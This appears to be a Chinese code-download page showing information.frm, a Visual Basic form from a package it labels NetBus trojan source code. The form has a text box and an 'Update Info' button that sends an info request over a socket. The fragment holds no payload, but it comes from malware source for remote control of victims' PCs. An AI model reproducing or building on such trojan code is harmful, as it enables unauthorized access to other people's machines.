⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 information.frm

📁 大名鼎鼎的Netbus木马源程序.
💻 FRM
字号:
VERSION 5.00
Begin VB.Form Information 
   BorderStyle     =   1  'Fixed Single
   Caption         =   "Information"
   ClientHeight    =   3435
   ClientLeft      =   45
   ClientTop       =   360
   ClientWidth     =   4260
   LinkTopic       =   "Form2"
   MaxButton       =   0   'False
   ScaleHeight     =   3435
   ScaleWidth      =   4260
   Begin VB.TextBox Text1 
      Height          =   2775
      Left            =   120
      Locked          =   -1  'True
      MultiLine       =   -1  'True
      ScrollBars      =   3  'Both
      TabIndex        =   1
      Top             =   120
      Width           =   3975
   End
   Begin VB.CommandButton Command3 
      Caption         =   "Update Info"
      Height          =   315
      Left            =   120
      TabIndex        =   0
      Top             =   3000
      Width           =   3975
   End
End
Attribute VB_Name = "Information"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False

Private Sub Command3_Click()
WSsnd Str(Info)
End Sub

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -